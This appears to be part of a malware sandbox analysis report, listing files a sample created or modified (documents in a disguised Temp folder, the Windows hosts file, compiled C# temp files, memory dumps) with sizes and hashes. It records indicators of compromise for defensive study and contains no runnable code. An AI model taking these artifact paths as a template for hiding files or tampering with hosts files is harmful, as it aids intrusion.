1a319eaff5935a528a60be34a8ad81527c8a04597b212f665c9bed285792ad611c5c43229a088439424671f593f30ab54955803f83404893093d6f462acd0591

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\ConnectPublish.docx

Filesize
18KB

MD5
eeb5621e036ccae2a086ce7b65725d03

SHA1
6a4acdec3608cc84b278023f50ffb793e11738a6

SHA256
e9a3d034fbb08ae9a6f10ccf92bce6827e12dca0c597556801d5dcc7bc00faa2

SHA512
75af5739a950f50b7536fba80872e83f0e09acf32d10df75073846023c93137234d52bb9de4e860498ced92275434c39f42383198d5187ca227c83ee0e81117a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\ConnectUnprotect.pdf

Filesize
1.6MB

MD5
850453ae28942eb5f96b2b2792b3dc72

SHA1
711ac97ecacb36aea4ed1302b136a1df852b507e

SHA256
e1ca8e2a3cee507ccf1d95fb7d43a4860afd3e0c832250007dca0171b3cf9f17

SHA512
f9b2e65bddde7c749a01dfa38f4f2cfdddb2d8efbed07c89a8d9ca162c88d1e560cd32184a175698f954cd3216cf91913e0322a4b22e5ed0809cb2c72444747e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\ConvertFromAdd.docx

Filesize
14KB

MD5
bf5c1529a28d9d1dec13ca248dba9ee4

SHA1
7d0e705345abb41695d184e2a54b7ad7bacbc0a5

SHA256
a56e6ae4a267fde7037c20a6089fb88bf5c120932e54265d691082955d4ba63d

SHA512
4a7a5b7a13ab25d4a356cdaa48a5e2bb494f94c2efc794c35db998ac70f532593d054fa6abc6b4c31c838e95d9af3bd2bbae631fa24608f0b730e663c2fa48cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\ConvertOut.txt

Filesize
999KB

MD5
b06c1f84b43c7139e0216c72e0765a28

SHA1
636311a2907a765ec0f07e7192d017f5f5a97ddc

SHA256
cfa2bfb68799866d22a8b7c36dde109f824cc51c316e8d6e4c725f072db0d192

SHA512
15fc11f313c4f7d0ddd06714619a56a131fc39386bac5f5b6d0d0e2f396842644894d5da9e619dd3fa41e447954b6b1ae9904edbc5dc2be380fc290f7e282b3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\GroupCompress.csv

Filesize
409KB

MD5
d2cce5c18486c05304e7a78b428685cc

SHA1
cb2bce0f2fa0c03e9381cacf06ed34cff71115bd

SHA256
87a7bac417ff9eff6f40703893d5a7bda119c8bed82f621274b5dbccae5d6f43

SHA512
4dfb783531178e9faa591813a6801f7cc8f020cc014c4e7879bd15a170e0f47e59c9ed40ae600bf9be80bceaf22979cb53809466095592509dd005be72c0ed13

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍  \Common Files\Documents\JoinApprove.docx

Filesize
17KB

MD5
d339a0e06a779d6c76466c597fe8a85e

SHA1
1d2a800cf3c325ff5b933a58c5afa8ad1b094f4e

SHA256
f874ab091642e1c449b567a990b6f0c5c2ad1d45257eb49f9f1b5dd7c69a242b

SHA512
e2319455b12e1a9bfa3b5fb669bf3f7ac9b75b10910fff30489cba20f62fdf737f6ce09447b35f730d65c0fae636d2f1b7093db5f497d47b02f44e68e574c5bb

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mxs3h1ga\CSC14A8769BD95C49EBB2CB469CFB64386.TMP

Filesize
652B

MD5
807ffbd5b0d9fe8c93e45cccce9d7fe7

SHA1
504b0f1b9df41d4630c3242228a042770bc7e74c

SHA256
f016130792b135ef4c04f3e088510d695edaf6549b4c19ccabba97649cb23cf1

SHA512
20f96f436da5fa61fe76e5d3014dae6d91bed2ec09dd8b5af7266679afbab9b18073073901bbc50f2ab36db4d749b7b6270bbb0351f2b79c7a7c54027e9adf13

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mxs3h1ga\mxs3h1ga.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mxs3h1ga\mxs3h1ga.cmdline

Filesize
607B

MD5
92c7f1c095d46a92f6a2f439d18ba121

SHA1
2b6a97d2e4b5f3d88ee5b6907cb89af4a4f20bb1

SHA256
70406d399c7c0fea213addc704a01df479b09d69ebb300d375e214eb2856bc29

SHA512
738a4137c99f95ed29091e3047d4c02ba658757cd252c322e56a6cd20e1a3f2a37820a11b27324fa102c1dfd5ed6ee724fcc524f4a731cb743741324ac692870

Download Submit
memory/2004-63-0x000002656DF30000-0x000002656DF52000-memory.dmp

Filesize
136KB

Download
memory/4296-184-0x000001A5A44A0000-0x000001A5A44A8000-memory.dmp

Filesize
32KB

Download